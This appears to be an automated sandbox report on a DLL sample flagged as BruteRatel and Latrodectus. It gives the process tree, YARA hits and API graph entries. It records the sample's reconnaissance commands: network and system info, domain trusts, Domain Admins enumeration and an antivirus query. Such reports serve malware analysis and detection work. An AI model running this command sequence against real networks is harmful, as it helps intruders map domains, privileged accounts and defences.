                                                                  Target ID:2
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:3
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:12:42:59
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:12:43:21
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff674740000
                                                                  File size:5'141'208 bytes
                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c ipconfig /all
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ipconfig /all
                                                                  Imagebase:0x7ff6067f0000
                                                                  File size:35'840 bytes
                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c systeminfo
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:systeminfo
                                                                  Imagebase:0x7ff67b490000
                                                                  File size:110'080 bytes
                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:12:44:51
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff6ef0c0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c nltest /domain_trusts
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\nltest.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:nltest /domain_trusts
                                                                  Imagebase:0x7ff634410000
                                                                  File size:540'672 bytes
                                                                  MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c nltest /domain_trusts /all_trusts
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\nltest.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:nltest /domain_trusts /all_trusts
                                                                  Imagebase:0x7ff634410000
                                                                  File size:540'672 bytes
                                                                  MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net view /all /domain
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net view /all /domain
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net view /all
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net view /all
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net group "Domain Admins" /domain
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net group "Domain Admins" /domain
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net1.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                  Imagebase:0x7ff69b7c0000
                                                                  File size:183'808 bytes
                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                  Imagebase:0x7ff6ea700000
                                                                  File size:576'000 bytes
                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net config workstation
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net config workstation
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net1.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\net1 config workstation
                                                                  Imagebase:0x7ff69b7c0000
                                                                  File size:183'808 bytes
                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:41
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                  Imagebase:0x7ff6ea700000
                                                                  File size:576'000 bytes
                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:42
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\findstr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:findstr /V /B /C:displayName
                                                                  Imagebase:0x7ff7d57d0000
                                                                  File size:36'352 bytes
                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c whoami /groups
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\whoami.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:whoami /groups
                                                                  Imagebase:0x7ff693020000
                                                                  File size:73'728 bytes
                                                                  MD5 hash:A4A6924F3EAF97981323703D38FD99C4
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:2.1%
                                                                    Dynamic/Decrypted Code Coverage:79.7%
                                                                    Signature Coverage:15.3%
                                                                    Total number of Nodes:701
                                                                    Total number of Limit Nodes:16

                                                                    Control-flow Graph

                                                                    • Function at 1ceafc94d00: calls GetUserNameW, GetComputerNameExW, GetTokenInformation, GetNativeSystemInfo, GetAdaptersInfo
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    • Opcode ID: d50f4ad2efba3391476b1df615d2eec79fdb99fb842461ae2565caf3412d5556
                                                                    • Instruction ID: b6cf34b8dbe0ae60a7c5d5f7c6fb1b1c84cb62a4ad0cc5af0a9ed7933d4c9509
                                                                    • Opcode Fuzzy Hash: d50f4ad2efba3391476b1df615d2eec79fdb99fb842461ae2565caf3412d5556
                                                                    • Instruction Fuzzy Hash: 1DA1C630218B089FFB54AB15D895BDEB3E6FB94340F40852DE44AC32D1DB75EA45CB86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2332935897.00007DF4A9FC0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4A9FC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_7df4a9fc0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989
                                                                    • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction ID: da1c0afb37d120cce94b48c8fe429dcf1c081946eedeca419ac758cd331161c9
                                                                    • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction Fuzzy Hash: BE71D031614A4C8FEF94EF6CC858BA977E1FB98315F104226E81ED72A0EB749955CB80
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2332935897.00007DF4A9FC0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4A9FC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_7df4a9fc0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0
                                                                    • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction ID: d22a1f8c8b266c6c1b8788c2b24742c58840f44bf7b1f1512376acd60c68d718
                                                                    • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction Fuzzy Hash: 0A21E13065494C8FEFA1EB6CCD58BEA33E1FB98314F404226D41EDB290EE35DA458750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    • Opcode ID: 5153d8f8c97089589795ae645a7e47378385fa85047d0636f0422ff5950f5102
                                                                    • Instruction ID: fbc4066b2f4b451035279cec02928eab07ba6c19267b2fe7ffb4b7ee20c4904a
                                                                    • Opcode Fuzzy Hash: 5153d8f8c97089589795ae645a7e47378385fa85047d0636f0422ff5950f5102
                                                                    • Instruction Fuzzy Hash: 9551F274148A085FF748EF29D855BF9B7E1FB46350F100259E49BC32E2DA39E802CB85

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0
                                                                    • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction ID: dd81d052d65e91575b807fdfc07f45366e11c6627d8a023665eaabf2a1adf37a
                                                                    • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction Fuzzy Hash: 3931A33165CB085FE768AF09DC46BFAB7E0FB95350F50061EE586C3291D620E84587CA

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
